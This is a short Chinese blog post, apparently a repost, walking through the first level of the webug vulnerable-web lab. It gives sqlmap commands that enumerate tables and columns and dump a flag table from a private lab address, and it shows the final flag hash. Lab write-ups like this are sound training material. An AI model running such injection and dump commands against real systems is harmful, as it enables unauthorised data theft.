码迷,mamicode.com
首页 > Web开发 > 详细

webug通关实记

时间:2017-10-09 20:59:22      阅读:525      评论:0      收藏:0      [点我收藏+]

标签:art   col   gid   ges   image   es2017   .com   bsp   body   

webug通关实记

1.

 

 

技术分享

get注入,放到sqlmap里跑一下

首先查看他使用哪个数据库

技术分享

 

sqlmap.py -u “http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1“ -D pentesterlab --tables

 

技术分享

 

sqlmap.py -u "http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

 

技术分享

 

sqlmap.py -u "http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag --dump

 

技术分享

 

最终结果为204f704fbbcf6acf398ffee11989b377

webug通关实记

标签:art   col   gid   ges   image   es2017   .com   bsp   body   

原文地址:http://www.cnblogs.com/zhuifengxiaozi/p/7642739.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!